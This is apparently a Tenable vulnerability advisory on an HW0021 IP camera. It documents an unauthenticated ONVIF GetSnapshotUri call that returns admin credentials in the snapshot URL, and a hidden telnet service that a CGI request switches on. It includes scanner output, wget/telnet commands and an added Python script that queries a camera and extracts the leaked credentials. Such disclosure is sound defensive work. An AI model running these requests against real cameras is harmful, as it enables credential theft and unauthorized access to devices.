Synopsis
CVE-2017-11510: Administrator Username and Password Disclosure
The ONVIF protocol supports a method called GetSnapshotUri. This method returns a URL that links to the most recent camera snapshot. When the HW0021 receives a GetSnapshotUri request from a remote, unauthenticated user, it responds with a URL that embeds the admin username and password as query parameters. Here is an example from Nessus' ONVIF implementation:

LobsterTrap:plugin_dev albinolobster$ /Library/Nessus/run/bin/nasl -aWMXr -t 192.168.1.178 ./onvif_get_snapshot.nasl
----------[ Executing onvif_detect.nbin ]------
The ONVIF service listening on UDP port 3702 advertises the following information:
Endpoint: http://192.168.1.178:8080/onvif/devices
Name: IPCAM
Model: C6F0SeZ0N0P0L0
audit-trail:success: The service listening on port 3702 has already been identified.
----------[ Finished onvif_detect.nbin ]------
----------[ Executing onvif_get_endpoints.nasl ]------
The ONVIF server on port 8080 supports these services:
http://www.onvif.org/ver20/analytics/wsdl => http://192.168.1.178:8080/onvif/analytics
http://www.onvif.org/ver10/events/wsdl => http://192.168.1.178:8080/onvif/events
http://www.onvif.org/ver10/device/wsdl => http://192.168.1.178:8080/onvif/devices
http://www.onvif.org/ver20/imaging/wsdl => http://192.168.1.178:8080/onvif/imaging
http://www.onvif.org/ver20/ptz/wsdl => http://192.168.1.178:8080/onvif/ptz
http://www.onvif.org/ver10/media/wsdl => http://192.168.1.178:8080/onvif/media
----------[ Finished onvif_get_endpoints.nasl ]------
----------[ Executing ./onvif_get_snapshot.nasl ]------
It was possible to obtain a screenshot from the following URL on the remote camera:
http://192.168.1.178:80/web/auto.jpg?-usr=admin&-pwd=cheesedoodle&
----------[ Finished ./onvif_get_snapshot.nasl ]------

You can see the username (admin) and password (cheesedoodle) in the output of the final plugin. No credentials were supplied to obtain it: the media service simply hands them out in the snapshot URL.
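The exchange above, as an added example that is not part of the advisory and is not Tenable's plugin code: it builds the SOAP 1.2 GetSnapshotUri request the media service expects, parses the GetSnapshotUriResponse, and flags any credentials embedded in the returned URI. The profile token "MainStream", the sample reply (modelled on the URL in the advisory), and the extra credential parameter names beyond the camera's own -usr/-pwd are assumptions made for this example; the send_get_snapshot_uri helper is only used when you point it at a live camera.

```python
"""Added example: ONVIF GetSnapshotUri request/response handling with a
check for credentials leaked in the snapshot URL. Not from the advisory
or from Nessus; profile token, sample reply and the broader parameter
list below are assumptions for illustration."""
import urllib.request
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

SOAP_NS = "http://www.w3.org/2003/05/soap-envelope"
TRT_NS = "http://www.onvif.org/ver10/media/wsdl"   # media service, as advertised on port 8080
TT_NS = "http://www.onvif.org/ver10/schema"
for _prefix, _uri in (("s", SOAP_NS), ("trt", TRT_NS), ("tt", TT_NS)):
    ET.register_namespace(_prefix, _uri)

# Query parameter names that map to credentials. -usr/-pwd are what the
# HW0021 emits; the rest are assumed variants added to widen the check.
CRED_PARAMS = {"-usr": "username", "-pwd": "password", "usr": "username",
               "user": "username", "pwd": "password", "password": "password"}


def build_get_snapshot_uri(profile_token: str) -> bytes:
    """Return the SOAP body for an unauthenticated GetSnapshotUri call (no WS-Security header)."""
    env = ET.Element(f"{{{SOAP_NS}}}Envelope")
    body = ET.SubElement(env, f"{{{SOAP_NS}}}Body")
    req = ET.SubElement(body, f"{{{TRT_NS}}}GetSnapshotUri")
    ET.SubElement(req, f"{{{TRT_NS}}}ProfileToken").text = profile_token
    return ET.tostring(env, encoding="utf-8", xml_declaration=True)


def parse_snapshot_uri(soap_reply: bytes) -> str:
    """Extract trt:MediaUri/tt:Uri from a GetSnapshotUriResponse envelope."""
    root = ET.fromstring(soap_reply)
    uri = root.find(f".//{{{TRT_NS}}}GetSnapshotUriResponse/"
                    f"{{{TRT_NS}}}MediaUri/{{{TT_NS}}}Uri")
    if uri is None or not uri.text:
        raise ValueError("reply carries no MediaUri/Uri element")
    return uri.text.strip()


def leaked_credentials(uri: str) -> dict:
    """Return {'username': ..., 'password': ...} for credentials found in the
    URI's userinfo or query string; an empty dict means nothing leaked."""
    parts = urlsplit(uri)
    found = {}
    if parts.username:
        found["username"] = parts.username
    if parts.password:
        found["password"] = parts.password
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        role = CRED_PARAMS.get(key.lower())
        if role and values and values[0]:
            found.setdefault(role, values[0])
    return found


def send_get_snapshot_uri(media_endpoint: str, profile_token: str, timeout: float = 5.0) -> str:
    """POST the request to a live media endpoint and return the snapshot URI (network required)."""
    req = urllib.request.Request(media_endpoint, data=build_get_snapshot_uri(profile_token),
                                 headers={"Content-Type": "application/soap+xml; charset=utf-8"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_snapshot_uri(resp.read())


# Constructed reply, shaped like the advisory's output (not a real capture).
SAMPLE_REPLY = b"""<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"
            xmlns:trt="http://www.onvif.org/ver10/media/wsdl"
            xmlns:tt="http://www.onvif.org/ver10/schema">
  <s:Body>
    <trt:GetSnapshotUriResponse>
      <trt:MediaUri>
        <tt:Uri>http://192.168.1.178:80/web/auto.jpg?-usr=admin&amp;-pwd=cheesedoodle&amp;</tt:Uri>
        <tt:InvalidAfterConnect>false</tt:InvalidAfterConnect>
        <tt:InvalidAfterReboot>false</tt:InvalidAfterReboot>
        <tt:Timeout>PT0S</tt:Timeout>
      </trt:MediaUri>
    </trt:GetSnapshotUriResponse>
  </s:Body>
</s:Envelope>"""


if __name__ == "__main__":
    # Offline demo: replace SAMPLE_REPLY with send_get_snapshot_uri(
    #   "http://192.168.1.178:8080/onvif/media", "MainStream") against a real camera.
    uri = parse_snapshot_uri(SAMPLE_REPLY)
    creds = leaked_credentials(uri)
    print("snapshot URI:", uri)
    print("leaked credentials:", creds or "none")
```

Against a patched or well-behaved device the returned URI should contain no credential parameters and leaked_credentials returns an empty dict; the snapshot should instead require HTTP authentication or a short-lived token when fetched.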
Hidden Telnet Functionality
Telnet is not enabled by default on the device. However, if an authenticated user requests /web/cgi-bin/hi3510/printscreenrequest.cgi, the camera starts telnetd. The TCP/23 connection is refused before the request and accepted after it:

albinolobster@ubuntu:~$ telnet 192.168.1.178
Trying 192.168.1.178...
telnet: Unable to connect to remote host: Connection refused
albinolobster@ubuntu:~$ wget --user admin --password labpass1 http://192.168.1.178/web/cgi-bin/hi3510/printscreenrequest.cgi &> /dev/null
albinolobster@ubuntu:~$ telnet 192.168.1.178
Trying 192.168.1.178...
Connected to 192.168.1.178.
Escape character is '^]'.
IPCamera login:
Solution
A patch has not been published.
Additional References
http://images.news.f-secure.com/Web/FSecure/%7B43df9e0d-20a8-404a-86d0-70dcca00b6e5%7D_vulnerabilities-in-foscam-IP-cameras_report.pdf
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]